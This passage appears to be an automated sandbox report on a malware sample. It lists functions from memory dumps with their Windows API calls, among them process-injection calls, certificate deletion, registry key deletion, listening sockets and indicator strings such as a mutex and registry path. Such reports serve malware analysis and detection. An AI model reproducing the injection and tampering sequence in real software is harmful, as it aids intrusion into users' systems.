Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

StrChrW.SHLWAPI(?,00000040,?,?), ref: 00C3F968

Part of subcall function 00C4C3E0: lstrlenW.KERNEL32(00C27C5C), ref: 00C4C3FC
Part of subcall function 00C4C3E0: lstrlenW.KERNEL32(?), ref: 00C4C402
Part of subcall function 00C4C3E0: memcpy.MSVCRT ref: 00C4C426

FreeLibrary.KERNEL32 ref: 00C3FA6D

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FECB99, Relevance: 7.7, APIs: 4, Instructions: 179

APIs

memcpy.MSVCRT ref: 00FECD50

Part of subcall function 00FECB99: memcpy.MSVCRT ref: 00FECBB0
Part of subcall function 00FECB99: CharLowerA.USER32 ref: 00FECC7B
Part of subcall function 00FECB99: CharLowerA.USER32(?), ref: 00FECC8B

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4CB99, Relevance: 7.7, APIs: 4, Instructions: 179

APIs

memcpy.MSVCRT ref: 00C4CD50

Part of subcall function 00C4CB99: memcpy.MSVCRT ref: 00C4CBB0
Part of subcall function 00C4CB99: CharLowerA.USER32 ref: 00C4CC7B
Part of subcall function 00C4CB99: CharLowerA.USER32(?), ref: 00C4CC8B

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD1FF8, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 173

APIs

Part of subcall function 00FF2DBA: WSAGetLastError.WS2_32 ref: 00FF2DF0
Part of subcall function 00FF2DBA: WSASetLastError.WS2_32(00002775), ref: 00FF2E54

memcmp.MSVCRT ref: 00FD2038
memcmp.MSVCRT ref: 00FD2050
memcpy.MSVCRT ref: 00FD2085

Part of subcall function 00FEF70B: memcpy.MSVCRT ref: 00FEF718

Part of subcall function 00FEF8BA: memcpy.MSVCRT ref: 00FEF8E7

Part of subcall function 00FCFF1E: EnterCriticalSection.KERNEL32(?,?,00000002,?,?,00FD2175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 00FCFF57
Part of subcall function 00FCFF1E: LeaveCriticalSection.KERNEL32(0000002C,?,?,00000002,?,?,00FD2175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 00FCFF7B

Part of subcall function 00FD1F85: GetTickCount.KERNEL32 ref: 00FD1F92

Part of subcall function 00FF2AB4: memset.MSVCRT ref: 00FF2AC9
Part of subcall function 00FF2AB4: getsockname.WS2_32(?,00FCC22C,?), ref: 00FF2ADC

Part of subcall function 00FF306E: memcmp.MSVCRT ref: 00FF3090

Part of subcall function 00FE6C9A: memcmp.MSVCRT ref: 00FE6D07
Part of subcall function 00FE6C9A: memcpy.MSVCRT ref: 00FE6E14
Part of subcall function 00FE6C9A: memcmp.MSVCRT ref: 00FE6F11
Part of subcall function 00FE6C9A: memset.MSVCRT ref: 00FE6F76
Part of subcall function 00FE6C9A: memcpy.MSVCRT ref: 00FE6F87

Strings

GET , xrefs: 00FD2032
POST , xrefs: 00FD204A

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C31FF8, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 173

APIs

Part of subcall function 00C52DBA: WSAGetLastError.WS2_32 ref: 00C52DF0
Part of subcall function 00C52DBA: WSASetLastError.WS2_32(00002775), ref: 00C52E54

memcmp.MSVCRT ref: 00C32038
memcmp.MSVCRT ref: 00C32050
memcpy.MSVCRT ref: 00C32085

Part of subcall function 00C4F70B: memcpy.MSVCRT ref: 00C4F718

Part of subcall function 00C4F8BA: memcpy.MSVCRT ref: 00C4F8E7

Part of subcall function 00C2FF1E: EnterCriticalSection.KERNEL32(?,?,00000002,?,?,00C32175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 00C2FF57
Part of subcall function 00C2FF1E: LeaveCriticalSection.KERNEL32(0000002C,?,?,00000002,?,?,00C32175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 00C2FF7B

Part of subcall function 00C31F85: GetTickCount.KERNEL32 ref: 00C31F92

Part of subcall function 00C52AB4: memset.MSVCRT ref: 00C52AC9
Part of subcall function 00C52AB4: getsockname.WS2_32(?,00C2C22C,?), ref: 00C52ADC

Part of subcall function 00C5306E: memcmp.MSVCRT ref: 00C53090

Part of subcall function 00C46C9A: memcmp.MSVCRT ref: 00C46D07
Part of subcall function 00C46C9A: memcpy.MSVCRT ref: 00C46E14
Part of subcall function 00C46C9A: memcmp.MSVCRT ref: 00C46F11
Part of subcall function 00C46C9A: memset.MSVCRT ref: 00C46F76
Part of subcall function 00C46C9A: memcpy.MSVCRT ref: 00C46F87

Strings

GET , xrefs: 00C32032
POST , xrefs: 00C3204A

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD65F3, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 115

APIs

Part of subcall function 00FD5D25: memset.MSVCRT ref: 00FD5D35

lstrlenA.KERNEL32(?,?,?), ref: 00FD66BC
lstrlenA.KERNEL32(?), ref: 00FD66CF

Part of subcall function 00FECB99: memcpy.MSVCRT ref: 00FECBB0
Part of subcall function 00FECB99: CharLowerA.USER32 ref: 00FECC7B
Part of subcall function 00FECB99: CharLowerA.USER32(?), ref: 00FECC8B
Part of subcall function 00FECB99: memcpy.MSVCRT ref: 00FECD50

Part of subcall function 00FD6AE4: memcpy.MSVCRT ref: 00FD6AF7

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Strings

?*, xrefs: 00FD66B1
:, xrefs: 00FD670A
:, xrefs: 00FD6731

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C365F3, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 115

APIs

Part of subcall function 00C35D25: memset.MSVCRT ref: 00C35D35

lstrlenA.KERNEL32(?,?,?), ref: 00C366BC
lstrlenA.KERNEL32(?), ref: 00C366CF

Part of subcall function 00C4CB99: memcpy.MSVCRT ref: 00C4CBB0
Part of subcall function 00C4CB99: CharLowerA.USER32 ref: 00C4CC7B
Part of subcall function 00C4CB99: CharLowerA.USER32(?), ref: 00C4CC8B
Part of subcall function 00C4CB99: memcpy.MSVCRT ref: 00C4CD50

Part of subcall function 00C36AE4: memcpy.MSVCRT ref: 00C36AF7

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Strings

?*, xrefs: 00C366B1
:, xrefs: 00C3670A
:, xrefs: 00C36731

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FDD9E7, Relevance: 7.6, APIs: 5, Instructions: 101

APIs

Part of subcall function 00FD5A4F: GetLastError.KERNEL32(?,?,00FCB9B4), ref: 00FD5A51
Part of subcall function 00FD5A4F: TlsGetValue.KERNEL32(?,?,00FCB9B4), ref: 00FD5A6E
Part of subcall function 00FD5A4F: TlsSetValue.KERNEL32(00000001), ref: 00FD5A80
Part of subcall function 00FD5A4F: SetLastError.KERNEL32(?,?,00FCB9B4), ref: 00FD5A90

GetProcessId.KERNEL32(?), ref: 00FDDA83

Part of subcall function 00FEBE5A: CreateMutexW.KERNEL32(01002974,00000001,?), ref: 00FEBEA0
Part of subcall function 00FEBE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00FEBEAC
Part of subcall function 00FEBE5A: CloseHandle.KERNEL32 ref: 00FEBEBA

Part of subcall function 00FCFBD5: TlsGetValue.KERNEL32(?,?,00FDD975), ref: 00FCFBDE

Part of subcall function 00FE4A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00FE4A89
Part of subcall function 00FE4A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00FE4AC4
Part of subcall function 00FE4A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00FE4B04
Part of subcall function 00FE4A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00FE4B27
Part of subcall function 00FE4A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00FE4B77

GetThreadContext.KERNEL32 ref: 00FDDAE5
SetThreadContext.KERNEL32(?,?), ref: 00FDDB24
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00FDDB3B
CloseHandle.KERNEL32(?), ref: 00FDDB45

Part of subcall function 00FD5AD5: GetLastError.KERNEL32(?,00FCBA1E), ref: 00FD5AD6
Part of subcall function 00FD5AD5: TlsSetValue.KERNEL32(00000000), ref: 00FD5AE6
Part of subcall function 00FD5AD5: SetLastError.KERNEL32(?,?,00FCBA1E), ref: 00FD5AED

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3D9E7, Relevance: 7.6, APIs: 5, Instructions: 101

APIs

Part of subcall function 00C35A4F: GetLastError.KERNEL32(?,?,00C2B9B4), ref: 00C35A51
Part of subcall function 00C35A4F: TlsGetValue.KERNEL32(?,?,00C2B9B4), ref: 00C35A6E
Part of subcall function 00C35A4F: TlsSetValue.KERNEL32(00000001), ref: 00C35A80
Part of subcall function 00C35A4F: SetLastError.KERNEL32(?,?,00C2B9B4), ref: 00C35A90

GetProcessId.KERNEL32(?), ref: 00C3DA83

Part of subcall function 00C4BE5A: CreateMutexW.KERNEL32(00C62974,00000001,?), ref: 00C4BEA0
Part of subcall function 00C4BE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00C4BEAC
Part of subcall function 00C4BE5A: CloseHandle.KERNEL32 ref: 00C4BEBA

Part of subcall function 00C2FBD5: TlsGetValue.KERNEL32(00000011,?,00C3D975), ref: 00C2FBDE

Part of subcall function 00C44A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C44A89
Part of subcall function 00C44A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00C44AC4
Part of subcall function 00C44A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C44B04
Part of subcall function 00C44A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C44B27
Part of subcall function 00C44A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C44B77

GetThreadContext.KERNEL32 ref: 00C3DAE5
SetThreadContext.KERNEL32(?,?), ref: 00C3DB24
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00C3DB3B
CloseHandle.KERNEL32(?), ref: 00C3DB45

Part of subcall function 00C35AD5: GetLastError.KERNEL32(?,00C2BA1E), ref: 00C35AD6
Part of subcall function 00C35AD5: TlsSetValue.KERNEL32(00000000), ref: 00C35AE6
Part of subcall function 00C35AD5: SetLastError.KERNEL32(?,?,00C2BA1E), ref: 00C35AED

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 0351D69D, Relevance: 7.6, APIs: 5, Instructions: 98

APIs

Part of subcall function 0351EB3A: EnterCriticalSection.KERNEL32(?,?,?,0351E322,0000000D,?,00000000,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351EB64

DecodePointer.KERNEL32(0353EEC8,00000020,0351D804,?,00000001,00000000,?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D), ref: 0351D6E7
DecodePointer.KERNEL32(?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D,?,00000000,?,?,?,0351EFA8), ref: 0351D6F8

Part of subcall function 0351E255: EncodePointer.KERNEL32(00000000,0351D714,?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D,?,00000000), ref: 0351E257

DecodePointer.KERNEL32(?,?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D,?,00000000,?,?,?), ref: 0351D71E
DecodePointer.KERNEL32(?,?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D,?,00000000,?,?,?), ref: 0351D731
DecodePointer.KERNEL32(?,?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D,?,00000000,?,?,?), ref: 0351D73B

Part of subcall function 0351EA61: LeaveCriticalSection.KERNEL32(?,0351EB38,0000000A,0351EB28,0353EF58,0000000C,0351EB55,?,?,?,0351E322,0000000D,?,00000000), ref: 0351EA70

Part of subcall function 0351D585: ExitProcess.KERNEL32(?,?,03520D5B,000000FF,0000001E,00000001,00000000,00000000,?,0351FEF1,?,00000001,?,?,0351EAC5,00000018), ref: 0351D596

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 0351DF2F, Relevance: 7.6, APIs: 5, Instructions: 71

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0351DF37
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0351DF75
FreeEnvironmentStringsW.KERNEL32 ref: 0351DFB7

Part of subcall function 0351FEE0: Sleep.KERNEL32(00000000), ref: 0351FF01

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 0351DF98
FreeEnvironmentStringsW.KERNEL32 ref: 0351DFAB

Part of subcall function 0351FE47: HeapFree.KERNEL32(00000000,00000000,?,0351E3F6,?,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351FE5D
Part of subcall function 0351FE47: GetLastError.KERNEL32(?,?,0351E3F6,?,?,?,?,0351EFA8,0351F652,?,0351D8A6,00000003), ref: 0351FE6F

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FCC77A, Relevance: 7.6, APIs: 6, Instructions: 61

APIs

Part of subcall function 00FCF1A8: EnterCriticalSection.KERNEL32(01003510,?,00FCC78E,?,?,?,00000001,00FE4DE8,00000001), ref: 00FCF1B8
Part of subcall function 00FCF1A8: LeaveCriticalSection.KERNEL32(01003510,?,00FCC78E,?,?,?,00000001,00FE4DE8,00000001), ref: 00FCF1E2

memset.MSVCRT ref: 00FCC7BC
memset.MSVCRT ref: 00FCC7C8
memset.MSVCRT ref: 00FCC7D4
InitializeCriticalSection.KERNEL32 ref: 00FCC7EC
InitializeCriticalSection.KERNEL32 ref: 00FCC807
InitializeCriticalSection.KERNEL32 ref: 00FCC844

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2C77A, Relevance: 7.6, APIs: 6, Instructions: 61

APIs

Part of subcall function 00C2F1A8: EnterCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1B8
Part of subcall function 00C2F1A8: LeaveCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1E2

memset.MSVCRT ref: 00C2C7BC
memset.MSVCRT ref: 00C2C7C8
memset.MSVCRT ref: 00C2C7D4
InitializeCriticalSection.KERNEL32 ref: 00C2C7EC
InitializeCriticalSection.KERNEL32 ref: 00C2C807
InitializeCriticalSection.KERNEL32 ref: 00C2C844

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE071B, Relevance: 7.5, APIs: 5, Instructions: 43

APIs

CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 00FE0734
CertDuplicateCertificateContext.CRYPT32(?,?,00000000), ref: 00FE0745
CertDeleteCertificateFromStore.CRYPT32(?,?,?,00000000), ref: 00FE0750
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00FE0758
CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 00FE0766

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4071B, Relevance: 7.5, APIs: 5, Instructions: 43

APIs

CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 00C40734
CertDuplicateCertificateContext.CRYPT32(?,?,00000000), ref: 00C40745
CertDeleteCertificateFromStore.CRYPT32(?,?,?,00000000), ref: 00C40750
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00C40758
CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 00C40766

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCDB89, Relevance: 7.5, APIs: 5, Instructions: 28

APIs

SetEvent.KERNEL32(?), ref: 00FCDB95
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FCDBA6
CloseHandle.KERNEL32(?), ref: 00FCDBAF
CloseHandle.KERNEL32(?), ref: 00FCDBBE

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

DeleteCriticalSection.KERNEL32(01111F88,?,00FCDB81,01111F88), ref: 00FCDBD5

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2DB89, Relevance: 7.5, APIs: 5, Instructions: 28

APIs

SetEvent.KERNEL32(?), ref: 00C2DB95
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C2DBA6
CloseHandle.KERNEL32(?), ref: 00C2DBAF
CloseHandle.KERNEL32(?), ref: 00C2DBBE

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

DeleteCriticalSection.KERNEL32(00000000,?,00C2DB81,00000000), ref: 00C2DBD5

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE10E0, Relevance: 7.5, APIs: 4, Instructions: 113

APIs

Part of subcall function 00FE0D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00FE0D60

RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FE113B
RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00FE11A5
RegFlushKey.ADVAPI32(00000000), ref: 00FE11D3
RegCloseKey.ADVAPI32(00000000), ref: 00FE11DA

Part of subcall function 00FE1051: EnterCriticalSection.KERNEL32(01003510,?,?,00000000,00FE11FB,?,?,?,7C809C98,00000014,00000000), ref: 00FE1067
Part of subcall function 00FE1051: LeaveCriticalSection.KERNEL32(01003510,?,?,00000000,00FE11FB,?,?,?,7C809C98,00000014,00000000), ref: 00FE108F
Part of subcall function 00FE1051: GetModuleHandleW.KERNEL32(advapi32.dll), ref: 00FE10AB
Part of subcall function 00FE1051: GetProcAddress.KERNEL32 ref: 00FE10B2
Part of subcall function 00FE1051: RegDeleteKeyW.ADVAPI32(?,?), ref: 00FE10D4

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

Part of subcall function 00FE0D19: RegFlushKey.ADVAPI32 ref: 00FE0D29
Part of subcall function 00FE0D19: RegCloseKey.ADVAPI32 ref: 00FE0D31

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C410E0, Relevance: 7.5, APIs: 4, Instructions: 113

APIs

Part of subcall function 00C40D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00C40D60

RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C4113B
RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00C411A5
RegFlushKey.ADVAPI32(00000000), ref: 00C411D3
RegCloseKey.ADVAPI32(00000000), ref: 00C411DA

Part of subcall function 00C41051: EnterCriticalSection.KERNEL32(00C63510,?,?,00000000,00C411FB,?,?,?,7C809C98,00000014,00000000), ref: 00C41067
Part of subcall function 00C41051: LeaveCriticalSection.KERNEL32(00C63510,?,?,00000000,00C411FB,?,?,?,7C809C98,00000014,00000000), ref: 00C4108F
Part of subcall function 00C41051: GetModuleHandleW.KERNEL32(advapi32.dll), ref: 00C410AB
Part of subcall function 00C41051: GetProcAddress.KERNEL32 ref: 00C410B2
Part of subcall function 00C41051: RegDeleteKeyW.ADVAPI32(?,?), ref: 00C410D4

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Part of subcall function 00C40D19: RegFlushKey.ADVAPI32 ref: 00C40D29
Part of subcall function 00C40D19: RegCloseKey.ADVAPI32 ref: 00C40D31

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD9F57, Relevance: 7.4, APIs: 4, Instructions: 87

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,00FCB41A,?), ref: 00FD9F69

Part of subcall function 00FF07B1: CoCreateInstance.OLE32(00FC17F8,00000000,00004401,00FC1858,?), ref: 00FF07C6

#2.OLEAUT32(00FCB41A,00000000,?,?,?,00FCB41A,?), ref: 00FD9F9D
#6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FCB41A,?), ref: 00FD9FD2
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00FD9FF2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C39F57, Relevance: 7.4, APIs: 4, Instructions: 87

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,00C2B41A,?), ref: 00C39F69

Part of subcall function 00C507B1: CoCreateInstance.OLE32(00C217F8,00000000,00004401,00C21858,?), ref: 00C507C6

#2.OLEAUT32(00C2B41A,00000000,?,?,?,00C2B41A,?), ref: 00C39F9D
#6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C2B41A,?), ref: 00C39FD2
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00C39FF2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE575A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 68

APIs

memset.MSVCRT ref: 00FE5774

Part of subcall function 00FEBAD3: memcpy.MSVCRT ref: 00FEBAEE
Part of subcall function 00FEBAD3: StringFromGUID2.OLE32(?), ref: 00FEBB92

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FE57BA

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

Strings

Software\Microsoft\Yfosteyq, xrefs: 00FE576E 00FE5773 00FE57FB
Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}, xrefs: 00FE577F

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FD6E19, Relevance: 7.4, APIs: 4, Instructions: 57

APIs

memcpy.MSVCRT ref: 00FD6E41
memcpy.MSVCRT ref: 00FD6E5E
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00FD6E74
WSASetLastError.WS2_32(0000274C), ref: 00FD6E83

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C36E19, Relevance: 7.4, APIs: 4, Instructions: 57

APIs

memcpy.MSVCRT ref: 00C36E41
memcpy.MSVCRT ref: 00C36E5E
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00C36E74
WSASetLastError.WS2_32(0000274C), ref: 00C36E83

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF2BF3, Relevance: 7.4, APIs: 4, Instructions: 54

APIs

Part of subcall function 00FF27C1: socket.WS2_32(?,?,00000006), ref: 00FF27F5

bind.WS2_32(?,00FF2CD1), ref: 00FF2C3A
listen.WS2_32(?,00000014), ref: 00FF2C4F
WSAGetLastError.WS2_32(00000000,?,00FF2CD1,?,?,?,?,00000000), ref: 00FF2C5D

Part of subcall function 00FF2968: shutdown.WS2_32(?,00000002), ref: 00FF2976
Part of subcall function 00FF2968: closesocket.WS2_32(?), ref: 00FF297F
Part of subcall function 00FF2968: WSACloseEvent.WS2_32(?), ref: 00FF2992

WSASetLastError.WS2_32(?,?,00FF2CD1,?,?,?,?,00000000), ref: 00FF2C6D

Part of subcall function 00FF2917: WSACreateEvent.WS2_32(00000000,?,00FF2C15,?,00000000,?,00FF2CD1,?,?,?,?,00000000), ref: 00FF292D
Part of subcall function 00FF2917: WSAEventSelect.WS2_32(?,?,00FF2CD1), ref: 00FF2943
Part of subcall function 00FF2917: WSACloseEvent.WS2_32(?), ref: 00FF2957

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C52BF3, Relevance: 7.4, APIs: 4, Instructions: 54

APIs

Part of subcall function 00C527C1: socket.WS2_32(?,?,00000006), ref: 00C527F5

bind.WS2_32(?,00C52CD1), ref: 00C52C3A
listen.WS2_32(?,00000014), ref: 00C52C4F
WSAGetLastError.WS2_32(00000000,?,00C52CD1,?,?,?,?,00000000), ref: 00C52C5D

Part of subcall function 00C52968: shutdown.WS2_32(?,00000002), ref: 00C52976
Part of subcall function 00C52968: closesocket.WS2_32(?), ref: 00C5297F
Part of subcall function 00C52968: WSACloseEvent.WS2_32(?), ref: 00C52992

WSASetLastError.WS2_32(?,?,00C52CD1,?,?,?,?,00000000), ref: 00C52C6D

Part of subcall function 00C52917: WSACreateEvent.WS2_32(00000000,?,00C52C15,?,00000000,?,00C52CD1,?,?,?,?,00000000), ref: 00C5292D
Part of subcall function 00C52917: WSAEventSelect.WS2_32(?,?,00C52CD1), ref: 00C52943
Part of subcall function 00C52917: WSACloseEvent.WS2_32(?), ref: 00C52957

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCCBBC, Relevance: 7.3, APIs: 4, Instructions: 139

APIs

Part of subcall function 00FCF1EF: memcmp.MSVCRT ref: 00FCF1FB

Part of subcall function 00FCF20B: memset.MSVCRT ref: 00FCF219
Part of subcall function 00FCF20B: memcpy.MSVCRT ref: 00FCF23A
Part of subcall function 00FCF20B: memcpy.MSVCRT ref: 00FCF260
Part of subcall function 00FCF20B: memcpy.MSVCRT ref: 00FCF284

TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,00FCD203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 00FCCC39

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00FCD203,?,?,00000000,?), ref: 00FCCCB3
EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00FCD203,?,?,00000000,?), ref: 00FCCCD2

Part of subcall function 00FCF0E1: memcmp.MSVCRT ref: 00FCF0FD

LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,00FCD203,?,?,00000000), ref: 00FCCD20

Part of subcall function 00FCEEE2: memcpy.MSVCRT ref: 00FCEFC1
Part of subcall function 00FCEEE2: memcpy.MSVCRT ref: 00FCEFE2

Part of subcall function 00FED95F: GetSystemTime.KERNEL32(?), ref: 00FED969

